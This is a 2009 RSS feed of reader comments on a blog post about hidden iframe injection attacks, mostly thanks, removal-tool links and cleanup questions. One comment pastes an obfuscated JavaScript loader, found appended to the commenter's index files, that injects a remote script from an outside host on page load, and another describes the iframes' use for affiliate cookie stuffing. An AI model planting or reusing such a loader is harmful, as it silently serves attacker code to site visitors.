<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Hidden iframe injection attacks</title>
	<atom:link href="http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/</link>
	<description></description>
	<lastBuildDate>Wed, 10 Mar 2010 00:00:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Konstantin Boyko</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2089</link>
		<dc:creator>Konstantin Boyko</dc:creator>
		<pubDate>Thu, 24 Dec 2009 18:26:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2089</guid>
		<description>Please check my article about this virus:

http://justcoded.com/article/gumblar-family-virus-removal-tool/</description>
		<content:encoded><![CDATA[<p>Please check my article about this virus:</p>
<p><a href="http://justcoded.com/article/gumblar-family-virus-removal-tool/" rel="nofollow">http://justcoded.com/article/gumblar-family-virus-removal-tool/</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: leono</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2088</link>
		<dc:creator>leono</dc:creator>
		<pubDate>Fri, 18 Dec 2009 14:40:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2088</guid>
		<description>I found the following code at last part to my index files: 

/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(&#039;script&#039;);Xs1ya4t7ajb13i.setAttribute(&#039;type&#039;, &#039;text/javascript&#039;);Xs1ya4t7ajb13i.setAttribute(&#039;id&#039;, &#039;myscript1&#039;);Xs1ya4t7ajb13i.setAttribute(&#039;src&#039;,  &#039;h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&amp;)t!#&amp;-))c#^!!o@&amp;)m@)$-####b$$r)#.$t&amp;&amp;a@b&amp;(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&amp;&amp;$e^r$^&amp;o#t!&amp;)i)&amp;)c#&amp;a$&amp;&amp;-@#)c$#!o)(^@#m)$&amp;(.#i$#n&amp;(n&amp;&amp;e&amp;w!$)t$&amp;e@r@!(r#@&amp;((a#(.#!&amp;r&amp;#u&amp;$#:(@&amp;8)^!0&amp;8$@)0!/($!g#)$(o&amp;#@o^!g!)l$&amp;^e^@.#!c#)(n(/^$g!(!o!^&amp;o@#&amp;@g)l^#(#e&amp;^@.$^$&amp;c!^)n(/!$(g!o^)&amp;!o@g&amp;(!l$(!!e&amp;@&amp;$.#&amp;c(($o&amp;)m&amp;#)/$(^h^&amp;))a^!o!1&amp;(2^##3#.&amp;&amp;#(c#!&amp;o&amp;m(#/)^&amp;i@@s@@&amp;)t)^^)o((!c$k&amp;(@!p##h#)@o(t)^#o^&amp;.^&amp;!c)#o^!m@$/$@#&#039;.replace(/&amp;&#124;\(&#124;#&#124;\!&#124;\)&#124;\^&#124;\$&#124;@/ig, &#039;&#039;));Xs1ya4t7ajb13i.setAttribute(&#039;defer&#039;, &#039;defer&#039;);document.body.appendChild(Xs1ya4t7ajb13i);}} catch(e) {}

what about y how I eliminate it?</description>
		<content:encoded><![CDATA[<p>I found the following code at last part to my index files: </p>
<p>/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(&#8217;script&#8217;);Xs1ya4t7ajb13i.setAttribute(&#8216;type&#8217;, &#8216;text/javascript&#8217;);Xs1ya4t7ajb13i.setAttribute(&#8216;id&#8217;, &#8216;myscript1&#8242;);Xs1ya4t7ajb13i.setAttribute(&#8217;src&#8217;,  &#8216;h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&amp;)t!#&amp;-))c#^!!o@&amp;)m@)$-####b$$r)#.$t&amp;&amp;a@b&amp;(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&amp;&amp;$e^r$^&amp;o#t!&amp;)i)&amp;)c#&amp;a$&amp;&amp;-@#)c$#!o)(^@#m)$&amp;(.#i$#n&amp;(n&amp;&amp;e&amp;w!$)t$&amp;e@r@!(r#@&amp;((a#(.#!&amp;r&amp;#u&amp;$#:(@&amp;8)^!0&amp;8$@)0!/($!g#)$(o&amp;#@o^!g!)l$&amp;^e^@.#!c#)(n(/^$g!(!o!^&amp;o@#&amp;@g)l^#(#e&amp;^@.$^$&amp;c!^)n(/!$(g!o^)&amp;!o@g&amp;(!l$(!!e&amp;@&amp;$.#&amp;c(($o&amp;)m&amp;#)/$(^h^&amp;))a^!o!1&amp;(2^##3#.&amp;&amp;#(c#!&amp;o&amp;m(#/)^&amp;i@@s@@&amp;)t)^^)o((!c$k&amp;(@!p##h#)@o(t)^#o^&amp;.^&amp;!c)#o^!m@$/$@#&#8217;.replace(/&amp;|\(|#|\!|\)|\^|\$|@/ig, &#8221;));Xs1ya4t7ajb13i.setAttribute(&#8216;defer&#8217;, &#8216;defer&#8217;);document.body.appendChild(Xs1ya4t7ajb13i);}} catch(e) {}</p>
<p>what about y how I eliminate it?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: TRouB</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2086</link>
		<dc:creator>TRouB</dc:creator>
		<pubDate>Thu, 17 Dec 2009 14:22:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2086</guid>
		<description>thanks..

it is helpful</description>
		<content:encoded><![CDATA[<p>thanks..</p>
<p>it is helpful</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: cikai</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2067</link>
		<dc:creator>cikai</dc:creator>
		<pubDate>Sat, 12 Dec 2009 18:47:17 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2067</guid>
		<description>wow... thank for the information... actually the hidden iframe was for cookie stuffing blackhat... for getting affiliate cookie on people who open the website... when people click on the advertisement then they will get the profit for themself... no the web owner who display the ads... :P</description>
		<content:encoded><![CDATA[<p>wow&#8230; thank for the information&#8230; actually the hidden iframe was for cookie stuffing blackhat&#8230; for getting affiliate cookie on people who open the website&#8230; when people click on the advertisement then they will get the profit for themself&#8230; no the web owner who display the ads&#8230; <img src='http://www.diovo.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Subrahmanyam</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2040</link>
		<dc:creator>Subrahmanyam</dc:creator>
		<pubDate>Thu, 03 Dec 2009 12:14:39 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2040</guid>
		<description>Hi....

Thanks a billion Diovo.

Malware which effected to my site : 

(document.write(&#039;&#039;);)

I found your blog while googling about asfirey Malware. 

Your code for identifying infected files worked for me.  

I am able to locate where exactly Malware effected webpages on my site. 

I searched, deleted infected files from my site and I uploaded new files. 

Now my site if fine and opening correctly. 

Thanks again!</description>
		<content:encoded><![CDATA[<p>Hi&#8230;.</p>
<p>Thanks a billion Diovo.</p>
<p>Malware which effected to my site : </p>
<p>(document.write(&#8221;);)</p>
<p>I found your blog while googling about asfirey Malware. </p>
<p>Your code for identifying infected files worked for me.  </p>
<p>I am able to locate where exactly Malware effected webpages on my site. </p>
<p>I searched, deleted infected files from my site and I uploaded new files. </p>
<p>Now my site if fine and opening correctly. </p>
<p>Thanks again!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Pop-zone</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2035</link>
		<dc:creator>Pop-zone</dc:creator>
		<pubDate>Wed, 25 Nov 2009 09:38:24 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2035</guid>
		<description>Thanks for the informative post, and thanks those who commented with more info.</description>
		<content:encoded><![CDATA[<p>Thanks for the informative post, and thanks those who commented with more info.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: האתר נפרץ? חמישה כלים שיסייעו לאתר פריצה &#124; חורים ברשת</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2008</link>
		<dc:creator>האתר נפרץ? חמישה כלים שיסייעו לאתר פריצה &#124; חורים ברשת</dc:creator>
		<pubDate>Thu, 12 Nov 2009 07:01:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2008</guid>
		<description>[...] עם תוסף מתאים תגלו כי הושתל בדפיו קוד זדוני או Iframes ממקורות בלתי מזוהים. כעת גם התוצאות של גוגל המובילות לבלוג כוללות אזהרה: [...]</description>
		<content:encoded><![CDATA[<p>[...] עם תוסף מתאים תגלו כי הושתל בדפיו קוד זדוני או Iframes ממקורות בלתי מזוהים. כעת גם התוצאות של גוגל המובילות לבלוג כוללות אזהרה: [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steve</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2003</link>
		<dc:creator>Steve</dc:creator>
		<pubDate>Mon, 09 Nov 2009 15:18:35 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2003</guid>
		<description>If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian (http://www.serverprogress.com/upload_guardian.php). It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.</description>
		<content:encoded><![CDATA[<p>If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian (<a href="http://www.serverprogress.com/upload_guardian.php" rel="nofollow">http://www.serverprogress.com/upload_guardian.php</a>). It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: spiney</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-2001</link>
		<dc:creator>spiney</dc:creator>
		<pubDate>Mon, 09 Nov 2009 00:17:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-2001</guid>
		<description>thanks for the post, this php iframe injection thing is completely new to me - so any help is good</description>
		<content:encoded><![CDATA[<p>thanks for the post, this php iframe injection thing is completely new to me &#8211; so any help is good</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: adicu</title>
		<link>http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/comment-page-2/#comment-1980</link>
		<dc:creator>adicu</dc:creator>
		<pubDate>Tue, 03 Nov 2009 08:53:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.diovo.com/?p=493#comment-1980</guid>
		<description>Do you have any script for Cold Fusion? tq</description>
		<content:encoded><![CDATA[<p>Do you have any script for Cold Fusion? tq</p>
]]></content:encoded>
	</item>
</channel>
</rss>
